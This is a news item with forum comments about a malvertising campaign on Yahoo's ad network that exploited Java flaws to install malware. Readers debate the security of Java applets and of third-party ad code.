Yahoo Advertising Serves Up Malware For Thousands 184
wjcofkc writes "Thousands of users have been affected by malicious advertisements served by ads.yahoo.com. The attack, which lasted several days, exploited vulnerabilities in Java and installed malware. The Netherlands based Fox-IT estimates that the infection rate was at about 27,000 infections per hour. In response to the breach in security, Yahoo issued the following statement, 'At Yahoo, we take the safety and privacy of our users seriously. We recently identified an ad designed to spread malware to some of our users. We immediately removed it and will continue to monitor and block any ads being used for this activity.' While the source of the attack remains unknown, Fox-IT says it appears to be 'financially motivated.' The Washington Post cites this incident as a reminder that Java has become an Internet security menace."
Become? (Score:5, Insightful)
As far as I've been concerned, Java and Javascript have both always been security menaces.
Letting web-sites and advertisers execute code has been a recipe for problems for a long time, which is why many of us here likely already block it.
This is just another example of why we can't trust the companies doing the advertising, because they're part of the problem -- if Yahoo is serving malware, Yahoo can't be trusted.
Image/text only ads (Score:5, Insightful)
This wouldn't be an issue if they could only serve image or text only ads. Possible image based exploits can easily be prevented by re-saving the uploaded image so that the image only contains valid content.
But no, ad farms want to provide functionality to reach maximum annoyance for the users. You can blame Java all you want, but it's not the source of this problem.
"has become"? (Score:1, Insightful)
a reminder that Java has become an Internet security menace
Java has always been a security menace.
And this is why... (Score:4, Insightful)
... using ad blocking and/or host files to deep-six ad networks not only produces a nicer user experience, but it's a valid security measure.
Trusting the web site is not enough. You have to trust the ad network too. Since any Joe Schmoe can buy ad space on an ad network, trusting the ad network means you're trusting Joe Schmoe.
I don't know about you guys, but I don't.
--
BMO
Yahoo is getting worse everyday (Score:3, Insightful)
New Yahoo Mail = complete unusable dog shit
New Flickr = complete fuck up! They don't even read user feedback.
New Ad delivery = source of malware! Even porn sites don't do that.
Re:Become? (Score:5, Insightful)
Java as a language is pretty much as secure as any other. Allowing it to run arbitrary code as 'applets' by default is a huge problem as the sandboxing seems quite poor.
Re:Become? (Score:5, Insightful)
In the abstract, as a standalone app, sure.
But on the web? No bloody way. Certainly not by default -- because it's always been a vector from annoying crap and malware.
Re:"has become"? (Score:2, Insightful)
Not sure if parent is trolling, or just confused.
Most of us know the difference between Java (a perfectly secure language) and the ability to run applets in a browser (a feature that can be exploited if the sandboxing is insecure). It doesn't matter whether we're talking about Java Applets or ActiveX. Hell, even interactive PDF forms have been used as attack vectors.
Re:Become? (Score:5, Insightful)
Any other language deployed the same way would offer a very similar attack surface. Simply put, it's the new ActiveX.
Re:Image/text only ads (Score:4, Insightful)
Indeed, the ad ops teams that "screen" these ads cant read code, and even if they could, the code in the ad tags is "minified" JS and they just can't logistically read each ad tag because of the sheen number of ads they need to run each day/week.
If Java didn't exist, nor Flash or Acrobat, these criminals would STILL be using the ad networks to compromise the browser itself. That's not to say the plugin model is a good one, but it's important to focus on the real problem.
This is true for all websites too. I suspect the WashPo uses the same ad ops standards Yahoo does, same as Slashdot, same as everyone. It's ad networks running arbitrary, 3rd-party, unknown code on users machines that's really fucking dangerous.
Yahoo knows (Score:5, Insightful)
So if your goal with a Java ad is to circumvent something that Adobe has blocked then it probably should remain blocked. On top of that most users have turned off Java so it can't be to reach a wider audience.
So when Yahoo allows advertisers to use Java they knew perfectly well that the advertisers were up to no good whatsoever. Their acting surprised that some of the scumbags took it even further is total BS.
Basically at this point, anyone who has Java turned on in the browser is the same as having a house with a weeks worth of newspapers stacked up at the front door. Effectively a greeting card inviting the criminals in.
Yahoo doesn't immediately know (Score:4, Insightful)
The ad didn't contain a Java applet.
It directed people to a website that then delivered the malware. Apparently it automatically redirected the browser, but that hasn't been confirmed.
So Yahoo allow Javascript in the ads, not Java.